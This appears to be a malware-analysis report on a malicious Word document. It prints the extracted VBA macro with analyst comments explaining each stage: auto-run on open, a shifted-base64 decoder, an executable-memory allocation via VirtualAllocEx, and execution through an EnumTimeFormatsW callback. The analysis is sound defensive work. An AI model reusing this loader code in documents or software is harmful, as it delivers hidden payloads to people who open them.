MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV heuristic identifies the file as 'Doc.Dropper.Agent-1830698', indicating it's a dropper. The presence of VBA macros, specifically a Document_Open macro, suggests an attempt to automatically execute malicious code upon opening. The macro's obfuscated nature and references to APIs like VirtualAlloc point towards payload execution, likely involving downloading additional malware.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-1830698 critical CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Dropper.Agent-1830698
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC — Reference to VirtualAlloc API
-
VBA macros detected medium 1 related finding OLE_VBA_MACROS — Document contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPEN — Document_Open macro. Matched line in script:
Attribute VB_Customizable = True Private Sub Document_Open() Dim alight As Variant -
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12006 bytes |
SHA-256: fc81393b1893b6f255a5b78c224c75eee340a4a24fe678ea69374211fb808a06 |
|||
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point (ATT&CK T1059.005): Word runs this when the document
' is opened. The only statement that matters is the call to immodest; the
' Dim lines, the string assignment and the While loop are padding that only
' touches otherwise-unused globals (torpedinidae, ghee).
Private Sub Document_Open()
Dim alight As Variant
Dim actitis As Variant
memorialist = "canker"
' Hands control to the decode-and-run routine in this module.
immodest
hemangioma = 4
' Three-iteration no-op loop (4 -> 7); filler.
While hemangioma <> 7
hemangioma = hemangioma + 1
torpedinidae = torpedinidae And 162
ghee = engross
Wend
End Sub
' Staging step of the loader: copies the decoded payload (boehmenism is a
' Variant holding the String returned by conjugation) into a freshly
' allocated executable region and returns that region's address.
' Aliases used here (see the Declare block in module bargainpriced):
'   mesocricetus = RtlMoveMemory, paganism = VirtualAllocEx.
Function salvo(boehmenism)
Dim accipere As Long
Dim ctenizidae As Integer
Dim immense As Long
' Reads 4 bytes at offset 8 of the Variant — presumably its data/BSTR
' pointer field — so immense becomes the address of the decoded bytes.
' Only 4 bytes are read even under Win64, so a 64-bit pointer would be
' truncated; the sample looks built for 32-bit Office.
mesocricetus immense, VarPtr(boehmenism) + 8, 4
Dim saracen As String
Dim donation As Integer
Dim degrading As Long
auspicial = 0
' Arithmetic-obfuscated arguments: 57-56-2 = -1 (current-process
' pseudo-handle), 13-65+52 = 0 (let the OS pick the address).
aerodynamics = 57 - 56 - 2
reasoned = 13 - 65 + 52
gewonnen = Round(473.95)
gewonnen = gewonnen \ 74
' 4096 = MEM_COMMIT; the literal 64 below = PAGE_EXECUTE_READWRITE.
mare = 4096
' VirtualAllocEx(-1, NULL, 9915, MEM_COMMIT, PAGE_EXECUTE_READWRITE):
' an RWX allocation inside the Office process — high-signal for EDR and
' covered by ASR "block Win32 API calls from Office macros".
bankruptcy = paganism(ByVal aerodynamics, ByVal reasoned, 9915, mare, 64)
gewonnen = torpedinidae * 4
' Same Variant trick as above: pulls the returned address out of bankruptcy.
mesocricetus degrading, VarPtr(bankruptcy) + 8, 4
gewonnen = gewonnen \ 150
' RtlMoveMemory(dest = new region, src = decoded bytes, 6183). 6183 equals
' the decoded size conjugation produces (8244 chars / 4 * 3).
mesocricetus ByVal degrading, immense, 6183
electrophoresis = 57
taipei = 76
' (57 - 76) is never 18, so the first branch always runs; both branches
' only build decoy strings that nothing reads.
If (electrophoresis - taipei) <> 18 Then
electrophoresis = "go" & "lden"
ghee = "tubed"
gewonnen = torpedinidae Or 210
sociolinguistics = Mid("subtestuncomlignified", 8, 5) & LCase$("municaTi") & Replace("vcoherent", "coherent", "e")
Else
ghee = "apology"
taipei = 76
End If
' Returns the address of the executable copy to immodest.
salvo = degrading
End Function
' Orchestrates the whole chain: take the encoded blob from a UserForm
' control, decode it (bargainpriced.conjugation), stage it in executable
' memory (salvo), then trigger it through a Win32 callback API
' (ohmmeter = EnumTimeFormatsW). The For loops, string juggling and most
' Dim lines are filler; their results are never read.
Sub immodest()
Dim abba As Variant
Dim apodemus As String
' unflattering is the UserForm module at the end of the listing; witness is
' presumably a control on it that exposes SelectedItem. The payload lives
' in that item's Name, not in the VBA source, so a macro-only scan of
' this listing never sees the blob itself.
Set mountains = unflattering.witness.SelectedItem
sectional = mountains.Name
' 67 + 8177 = 8244: the exact character count conjugation consumes.
heliograph = 67 + 8177
antioxidant = Right(sectional, heliograph)
depicture = bargainpriced.conjugation(antioxidant)
' Junk loop; intoxicate is never used.
For informative = 49 To 66
buxus = 66
gewonnen = gewonnen * 3
intoxicate = LCase$("AVE") & Mid("unvaluedrsenetitian", 9, 5) & LCase$("SS")
intoxicate = LCase$("lE") & "avings"
Next informative
lambaste = "bras"
' alula receives the staged payload address; everything else in this
' conditional block (the cebu instance, despise, bouncing) is unused.
#If VBA6 And Win64 Then
Dim mysophobic As Variant
Dim eclaircissement As cebu
Dim alula As LongPtr
eclaircissement.start = 29 - 29
Dim pleurotus As String
#Else
Dim despise As Integer
eclaircissement = 0
Dim bouncing As Long
Dim alula As Long
#End If
indistinct = 0
atropa = "snu" & "ffcolored"
sacred = 100 - 44 - 15 + 4055
' Junk loop; note it also overwrites the global engross.
For allochthonous = 35 To 57
impugnable = 57
engross = "bowiea"
pinto = Replace("sebioluminescent", "bioluminescent", "lf") & "lessness"
pinto = "str" & "uctur" & Replace("ainclemency", "inclemency", "l")
Next allochthonous
unagitated = "subpanation"
kwack = "fluoroboride"
For alectryomancy = 48 To 76
ichthyolatry = 76
gewonnen = gewonnen - 369
banteng = "ph" & "onetic"
banteng = Mid("passeridaecojeffersonian", 11, 2) & "unter" & Mid("mpjumperunit", 3, 6)
Next alectryomancy
' Decoded bytes -> executable copy; alula now holds its address.
anecdotic = depicture
lycanthropy = "nonsurgical"
alula = salvo(anecdotic)
addresses = Mid("backswimmerwjdigitalis", 12, 2)
meekly = "bronze"
' arrowy is the entry offset within the copied payload: 62+6+70+1142 =
' 1280 on Win64, (17+32+457) + 3171 = 3677 on Win32. The strings are decoys.
#If VBA6 And Win64 Then
Dim allegory As String
dishonest = "causans"
moraceous = "agaricaceae"
arrowy = 62 + 6 + 70 + 1142
#ElseIf Win32 Then
cornishman = "comptrollership"
slash = "ca" & "ntab" & Mid("scopoliarigianclumsy", 9, 6)
bandurria = 17 + 32 + 457
arrowy = bandurria + 3171
#End If
Dim myxine As String
Dim heliport As Variant
Dim sabbath As Long
' 92+86-101+1971 = 2048 = 0x800 (LOCALE_SYSTEM_DEFAULT), the Locale argument.
sabbath = 92 + 86 - 101 + 1971
Dim astound As Long
' Declared Long even under Win64, so a high 64-bit address would overflow
' here — more evidence the sample targets 32-bit Office.
astound = alula + arrowy
Dim inconsequence As Long
inconsequence = 0
' EnumTimeFormatsW(lpTimeFmtEnumProc, Locale, dwFlags): the first argument
' is a callback pointer, so passing the payload address makes the OS call
' into the RWX buffer. This is the execution step — no CreateThread or
' CallWindowProc is needed. Detection angle: enumeration/callback APIs
' invoked with a callback address outside any loaded image.
zonam = ohmmeter(astound, sabbath, inconsequence)
' Trailing junk loop.
For cocaine = 3 To 74
amalgamative = 74
ghee = "melody"
aversation = LCase$("bu") & "shman"
aversation = Replace("acivility", "civility", "n") & "alogue"
Next cocaine
End Sub
' Not part of the loader: nothing in this listing calls num. It reads like
' a stock Word automation snippet (delete the selected cells, shifting up
' or left), presumably pasted in so the project looks like ordinary
' document tooling. Note the bare End statement, which halts all running
' macro code, not just this Sub.
Sub num()
With Selection
If .Columns.Count > 1 And .Rows.Count > 1 Then
MsgBox "Please select cells in only one row " _
& "or only one column."
End
Else
If .Cells.Count > 1 Then
If .Columns.Count > 1 Then
.Cells.Delete ShiftCells:=wdDeleteCellsShiftUp
Else
.Cells.Delete ShiftCells:=wdDeleteCellsShiftLeft
End If
Else
.Cells.Delete ShiftCells:=wdDeleteCellsShiftLeft
End If
End If
End With
End Sub
Attribute VB_Name = "bargainpriced"
'Love's an elusive charm and it can be painful
' Win32 API surface of module bargainpriced. Every import is declared under
' a meaningless alias, so the real export name (right of "Alias") is the
' only giveaway. Only three aliases are referenced anywhere in this listing,
' and they keep the same name in both compilation branches so the caller
' code compiles either way:
'   mesocricetus = ntdll!RtlMoveMemory      (copy bytes)
'   paganism     = kernel32!VirtualAllocEx  (allocate executable memory)
'   ohmmeter     = kernel32!EnumTimeFormatsW (callback used to run it)
' EndPaint, OpenClipboard, Sleep, SetParent and GetUpdateRect are declared
' but never called here — decoys that pad the import list. The lyric
' comments are filler; the 'п»ї' prefix on one of them looks like a UTF-8
' BOM rendered in a single-byte code page, i.e. the module text was
' probably assembled from a BOM-prefixed file.
#If VBA6 And Win64 Then
'п»їLove can be so strange
' Unused helper type: immodest declares an instance and sets start = 0.
Public Type cebu
'No you're never gonna crack
start As LongPtr
'You can keep it pure on the inside
End Type
'And you know what you believe to be right
Public Declare PtrSafe Function hoop Lib "user32" Alias "EndPaint" (flatten As LongPtr,education As LongPtr) As LongPtr
'You can keep it pure on the inside
Public Declare PtrSafe Function workboard Lib "user32" Alias "OpenClipboard" (garderobe As LongPtr) As Boolean
'Cause life is so short there's no time to waste it
Public Declare PtrSafe Function nube Lib "kernel32.dll" Alias "Sleep" (bone As LongPtr)
'To late for solutions to solve in the setting sun
' Used by salvo (three calls): pointer extraction and the payload copy.
Public Declare PtrSafe Sub mesocricetus Lib "ntdll.dll" Alias "RtlMoveMemory" (busbar As Any, ByVal accompanist As Any, ByVal buckleya As LongPtr)
'To understand this crazy world
Public Declare PtrSafe Function arbitrage Lib "user32" Alias "SetParent" (ByVal impetrate As LongPtr, ByVal tc As LongPtr,dunderhead As LongPtr) As LongPtr
'To understand this crazy world
Public Declare PtrSafe Function barroom Lib "user32" Alias "GetUpdateRect" (halfbeak As LongPtr, imperator As LongPtr,cog As LongPtr) As Boolean
'So when nothing seems too certain or safe
' Used by immodest as the execution trigger (first parameter is a callback).
Public Declare PtrSafe Function ohmmeter Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal nonpasserine As Any, ByVal alumnus As Any, ByVal rhamnus As Any) As LongPtr
'So when nothing seems too certain or safe
' Used by salvo to obtain the RWX region.
Public Declare PtrSafe Function paganism Lib "kernel32.dll" Alias "VirtualAllocEx" (cotenancy As LongPtr, africanamerican As LongPtr, ByVal lollipop As LongPtr, ByVal assisted As LongPtr, ByVal base As LongPtr) As LongPtr
'So when nothing seems too certain or safe
'So when nothing seems too certain or safe
#Else
' 32-bit branch: same three live imports under the same aliases, decoys
' under different names.
'So when nothing seems too certain or safe
Public Declare Function ohmmeter Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal cryptobiotic As Any, ByVal temerarious As Any, ByVal furlike As Any) As Long
'So when nothing seems too certain or safe
Public Declare Function ladyofthenight Lib "user32" Alias "GetUpdateRect" (disclaimer As Long, pliers As Long, duck As Long) As Boolean
'So when nothing seems too certain or safe
Public Declare Function foxy Lib "user32" Alias "EndPaint" (chilblain As Long, anthericum As Long) As Long
'So when nothing seems too certain or safe
Public Declare Sub mesocricetus Lib "ntdll.dll" Alias "RtlMoveMemory" (estranged As Any, ByVal exhaled As Any, ByVal genial As Long)
'So when nothing seems too certain or safe
Public Declare Function prohibitionist Lib "user32" Alias "SetParent" (ByVal pawky As Long, ByVal motazilite As Long, phantom As Long) As Long
'No you're never gonna crack
Public Declare Function overrighteous Lib "kernel32.dll" Alias "Sleep" (fluster As Long)
'So when nothing seems too certain or safe
Public Declare Function paganism Lib "kernel32.dll" Alias "VirtualAllocEx" (amore As Long, chieftaincy As Long, ByVal pedantry As Long, ByVal unestablished As Long, ByVal neglige As Long) As Long
'Run my baby run my baby run
Public Declare Function gullet Lib "user32" Alias "OpenClipboard" (angular As Long) As Boolean
'So run my baby run my baby run
'No you're never gonna crack
#End If
'No you're never gonna crack
' Thin wrapper around AscW: returns the UTF-16 code of the first character
' of gift. Called once per input character by conjugation.
Function runup(gift)
runup = AscW(gift)
End Function
' Payload decoder. Input is the 8244-character string taken from the form
' control; output is a String carrying the raw decoded bytes (6183 real
' bytes at the front of a 6966-byte buffer; salvo copies exactly 6183).
' The scheme is ordinary base64 with one twist: every stored character is
' 8 below the real base64 character, so the blob does not match base64
' patterns at rest. Recovery for analysis: add 8 to each character code,
' then base64-decode. All the "x = a + b - c" lines are arithmetic
' obfuscation of constants; the values are spelled out in the comments.
Function conjugation(diffusive) As String
Dim travesty As Byte
Dim counts As Long
Dim shakeout As Long
Dim constringe(63) As Long
Dim brooklime As Integer
Dim mutal(63) As Long
backbend = engross
Dim twentyeight(63) As Long
Dim levity As String
Dim gumption As Long
Dim bugloss() As Byte
Dim cosigner(255) As Byte
Dim ghyll As String
Dim cruciferous As String
Dim pentahedron As Long
Dim leisureiy(6965) As Byte
engross = backbend
Dim pianino As Variant
' arthroscopy = 16711680 = &HFF0000 (byte-0 mask)
arthroscopy = 73 + 16711607
' barbarian = 256, gracefully = 255, spermatophyta = 64
barbarian = 33 - 6 - 109 + 338
gracefully = 94 + 24 - 53 + 190
spermatophyta = 126 + 14 + 11 - 87
' fuliginous, nuptial, cutlery and potboiler are never read — decoys.
fuliginous = 16515072
nuptial = 4032
' belted = 65536 (divisor for byte 0)
belted = 87 - 71 + 65520
cutlery = 258048
' stung = 262144 = 2^18
stung = 110 - 119 + 262153
Dim acclamation As Variant
Dim mutilate As Variant
' bumboat = &HFF00 (byte-1 mask), visavis = 4096 = 2^12
bumboat = 65280
visavis = 4096
potboiler = 63
Dim bushwhacker As String
Dim botryoid(8243) As Byte
' Loop bounds 0 .. 8243: copies the code of characters 1..8244 of the
' input into botryoid. diet/brooch/testiness are decoy strings.
hagiography = 49 + 90 - 139
enwrap = 128 + 8115
For auburn = hagiography To enwrap
marvelous = 1
aposiopetic = Mid$(diffusive, auburn + 1, marvelous)
diet = LCase$("In") & "gest" & Replace("esait", "sait", "d")
brooch = "in" & "finitival"
testiness = "cashmere"
latria = runup(aposiopetic)
botryoid(auburn) = latria
Next
Dim nobody As Long
' Junk loop (8 -> 11).
diver = 8
While diver <> 11
diver = diver + 1
torpedinidae = Round(361.1195)
gewonnen = torpedinidae \ 184
Wend
neurology = 8243
decolletage = 35
' Un-shift step: +8 on every character restores the standard base64
' alphabet before the lookup below.
For cherubim = 0 To neurology
botryoid(cherubim) = botryoid(cherubim) + 8
Next cherubim
' Junk loop.
For hasten = 45 To 51
saline = 51
backbend = ghee
brooding = "si" & "mon"
brooding = "pro" & "hibiti" & "vely"
Next hasten
brooklime = 0
fist = 122
' Standard base64 reverse table over ASCII 0..255:
'   'A'..'Z' -> 0..25, 'a'..'z' -> 26..51, '0'..'9' -> 52..61,
'   '+' (43) -> 62, '/' (47) -> 63.
boundless = 67 + 188
For pentahedron = 0 To boundless
If (pentahedron >= 65) And (pentahedron <= 90) Then
cosigner(pentahedron) = pentahedron - 65
ElseIf (pentahedron >= 97) And (pentahedron <= 122) Then
cosigner(pentahedron) = pentahedron - 71
ElseIf (pentahedron >= 48) And (pentahedron <= 57) Then
cosigner(pentahedron) = pentahedron + 4
ElseIf pentahedron = 43 Then
cosigner(pentahedron) = 62
ElseIf pentahedron = 47 Then
cosigner(pentahedron) = 63
End If
Next pentahedron
' Weight tables: value * 64, * 4096, * 262144 — i.e. the 6-, 12- and
' 18-bit left shifts of a base64 group (antipoison is plain multiplication).
For pentahedron = 0 To 63
constringe(pentahedron) = antipoison(pentahedron, spermatophyta)
mutal(pentahedron) = antipoison(pentahedron, visavis)
twentyeight(pentahedron) = antipoison(pentahedron, stung)
Next pentahedron
' Junk loop (6 -> 10).
archon = 6
While archon <> 10
archon = archon + 1
torpedinidae = Abs(305.933)
gewonnen = Fix(222.1423)
Wend
bugloss = botryoid
koine = 30 + 28 - 120 + 66
' Junk loop; pelican is never read.
For brushy = 6 To 53
dendrobium = 53
gewonnen = torpedinidae * 1
pelican = Replace("macknowledgment", "acknowledgment", "e") & LCase$("tEorOlOgy")
pelican = LCase$("Bi") & Mid("cobolsulcousexpressive", 6, 7)
Next brushy
' educt = 3 (offset of the 4th symbol in a group); mute = 2 (offset of the
' 3rd output byte). The global writes to engross/backbend are noise.
educt = 80 - 67 - 10
engross = "anthriscus"
backbend = "drynaria"
calibration = educt + 1
mute = 50 - 92 + 44
' Main decode loop. Each pass consumes four 6-bit symbols
' (counts .. counts+3) into a 24-bit value, then splits it into three
' bytes: (v And &HFF0000) \ 65536, (v And &HFF00) \ 256, v And &HFF.
' draw = And, slowconsuming = integer division. counts advances by 4 per
' pass (the "+ 3" plus Next) and shakeout by 3; 8244 / 4 * 3 = 6183 bytes.
For counts = 0 To neurology
alkylbenzenesulfonate = bugloss(counts)
discreditable = bugloss(counts + 2)
gumption = twentyeight(cosigner(alkylbenzenesulfonate)) _
+ mutal(cosigner(bugloss(counts + 1))) + constringe(cosigner(discreditable)) + cosigner(bugloss(counts + educt))
pentahedron = draw(gumption, arthroscopy)
leisureiy(shakeout) = slowconsuming(pentahedron, belted)
pentahedron = draw(gumption, bumboat)
leisureiy(shakeout + 1) = slowconsuming(pentahedron, barbarian)
leisureiy(shakeout + mute) = draw(gumption, gracefully)
shakeout = shakeout + mute + 1
counts = counts + 3
Next
' Byte array assigned to the String return: the bytes come back as-is.
conjugation = leisureiy
End Function
' Plain multiplication behind a function name; conjugation uses it to build
' its bit-shift weight tables (value * 64 / 4096 / 262144).
Function antipoison(strawbail, periphrase)
antipoison = strawbail * periphrase
End Function
' Not part of the loader: nothing in this listing calls tableSel, and it
' would fail at runtime anyway — tempRange is never declared or assigned
' (no Option Explicit is visible, so it is an empty Variant). Looks like a
' Word documentation snippet pasted in as cover.
Sub tableSel()
Dim tempTable
Documents("Log.doc").Tables(1).Select
Set tempTable = Selection.Tables(1).Range
tempRange.Tables(2).Select
End Sub
' Bitwise And behind a function name; conjugation uses it to mask out one
' byte of each decoded 24-bit group.
Function draw(cambodia, agamid)
draw = cambodia And agamid
End Function
' Integer division behind a function name; conjugation uses it (with 65536
' and 256) to shift a masked byte down into position.
Function slowconsuming(titus, analgesia)
slowconsuming = titus \ analgesia
End Function
Attribute VB_Name = "unflattering"
Attribute VB_Base = "0{FB913D05-D54F-43AE-B223-61BE15D5BE39}{8E83D3FF-7B80-4FEA-A1FA-EA1D5AC9E624}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||